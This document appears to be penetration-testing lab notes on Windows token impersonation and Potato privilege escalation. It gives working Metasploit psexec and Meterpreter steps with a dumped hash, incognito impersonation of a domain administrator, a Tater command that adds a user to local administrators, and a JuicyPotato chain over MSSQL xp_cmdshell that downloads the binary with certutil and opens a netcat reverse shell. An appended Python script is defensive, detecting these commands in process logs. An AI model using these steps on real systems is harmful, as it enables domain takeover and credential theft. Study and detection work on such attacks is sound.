Token Impersonation - Potato attacks

What is it

  • Tokens are temporary keys that give access to a system or network without credentials.

How to

  • Launch Metasploit: msfconsole

  • Choose the exploit: use exploit/windows/smb/psexec

  • Set: rhosts, smbdomain, smbpass, smbuser, target (show targets lists the available ones), payload

  • Launch the attack: run

  • We get a shell:

    msf6 exploit(windows/smb/psexec) > run
    [*] Started reverse TCP handler on 
    [*] - Connecting to the server...
    [*] - Authenticating to|marvel.local as user 'fcastle'...
    [!] - peer_native_os is only available with SMB1 (current version: SMB3)
    [*] - Uploading payload... oeyrkyrs.exe
    [*] - Created \oeyrkyrs.exe...
    [*] Sending stage (200262 bytes) to
    [+] - Service started successfully...
    [*] - Deleting \oeyrkyrs.exe...
    [*] Meterpreter session 1 opened ( -> ) at 2022-02-11 13:49:12 -0500
    meterpreter > 

  • Getting hashes: hashdump

    meterpreter > hashdump
    Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::

  • Use tools: load (press Tab twice to get the list of tools)

  • load incognito

    Incognito Commands
        Command              Description
        -------              -----------
        add_group_user       Attempt to add a user to a global group with all tokens
        add_localgroup_user  Attempt to add a user to a local group with all tokens
        add_user             Attempt to add a user with all tokens
        impersonate_token    Impersonate specified token
        list_tokens          List tokens available under current user context
        snarf_hashes         Snarf challenge/response hashes for every token

  • list_tokens -u

    meterpreter > list_tokens -u
    Delegation Tokens Available
    Font Driver Host\UMFD-0
    Font Driver Host\UMFD-1
    Font Driver Host\UMFD-2
    Window Manager\DWM-1
    Window Manager\DWM-2
    Impersonation Tokens Available
    No tokens available

  • Impersonate Administrator:

    meterpreter > impersonate_token marvel\\administrator
    [+] Delegation token available
    [+] Successfully impersonated user MARVEL\Administrator
    meterpreter > shell
    Process 8576 created.
    Channel 1 created.
    Microsoft Windows [Version 10.0.19044.1288]
    (c) Microsoft Corporation. All rights reserved.

  • If we hashdump again it will not work, so we can use rev2self to get back to the initial user

  • Any user who has logged in to the target will have a token there until the target reboots

Potato Attacks

  • These attacks require the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege to be enabled on the machine.

Hot potato

  • We can use Tater

  • powershell.exe -nop -ep bypass

  • Import-Module .\Tater.ps1

  • Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

  • Your user should now be in the administrators group; run net localgroup administrators to check

  • See here an example of a potato attack

Juicy potato

Enumeration after initial shell with MSSQL

  • Say we have a shell on an MSSQL instance: sql_dev@IP-ADD -windows-auth

  • We can enable the command shell using enable_xp_cmdshell

  • We can then run any command we need this way: xp_cmdshell whoami /priv

  • We do!


  • Let's get the JuicyPotato binary on our attacking machine: wget

  • Let's serve the file to our target using the Python HTTP server: python3 -m http.server 80

  • Let's download it from our shell using certutil: xp_cmdshell certutil.exe -urlcache -f C:\Tools\JuicyPotato.exe

  • Let's get an admin shell: xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 8443 -e cmd.exe" -t *

    Here -l is the COM server listening port, -p is the program to launch (cmd.exe), -a is the argument passed to cmd.exe, and -t is the createprocess call. With -t * we try both the CreateProcessWithTokenW and CreateProcessAsUser functions, which need SeImpersonate or SeAssignPrimaryToken privileges respectively.
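
Seen from the defender's side, the MSSQL steps above leave process-creation events that can be matched. The Python below is an added example, not part of the original notes: the rule names, host names, the 192.0.2.10 address and the sample events are constructed, the field names follow Sysmon Event ID 1, and the heuristics are assumptions rather than a vendor rule set.

```python
import re

# certutil used as a downloader: -urlcache ... -f, as in the command on this page.
CERTUTIL_DL = re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*\s-f\b", re.I)
# Argument shape of the JuicyPotato command on this page: -l <port>, -p <program>, -t <t|u|*>.
POTATO_ARGS = re.compile(r"(?=.*\s-l\s+\d+)(?=.*\s-p\s+\S+)(?=.*\s-t\s+[tu*])", re.I)
SHELLS = {"cmd.exe", "powershell.exe"}

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(event):
    """Return the names of the rules that fire for one process-creation event."""
    hits = []
    cmd = event.get("CommandLine", "")
    parent = basename(event.get("ParentImage", ""))
    # xp_cmdshell runs its command through cmd.exe as a child of the SQL Server service.
    if parent == "sqlservr.exe" and basename(event.get("Image", "")) in SHELLS:
        hits.append("mssql_spawned_shell")
    if CERTUTIL_DL.search(cmd):
        hits.append("certutil_urlcache_download")
    if POTATO_ARGS.search(cmd):
        hits.append("potato_style_arguments")
    return hits

def triage(events):
    """List (host, sorted rule names) for hosts with hits, most distinct rules first."""
    by_host = {}
    for ev in events:
        by_host.setdefault(ev["Computer"], set()).update(detect(ev))
    ranked = sorted(by_host.items(), key=lambda kv: -len(kv[1]))
    return [(host, sorted(rules)) for host, rules in ranked if rules]

SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"
# Constructed sample events; hosts, paths and the URL are placeholders.
SAMPLE_EVENTS = [
    {"Computer": "SQL01", "ParentImage": SQL, "Image": CMD,
     "CommandLine": r'"cmd.exe" /c whoami /priv'},
    {"Computer": "SQL01", "ParentImage": SQL, "Image": CMD, "CommandLine":
     r'"cmd.exe" /c certutil.exe -urlcache -f http://192.0.2.10/JuicyPotato.exe C:\Tools\JuicyPotato.exe'},
    {"Computer": "SQL01", "ParentImage": SQL, "Image": CMD, "CommandLine":
     r'"cmd.exe" /c c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -t *'},
    {"Computer": "WS07", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Users\a\file.iso SHA256"},
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS):
        print(host, rules)
```

The argument-shape rule matches on flags, not on the binary name, so it still fires if the executable is renamed; expect to tune it against benign tools that share the same flags.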

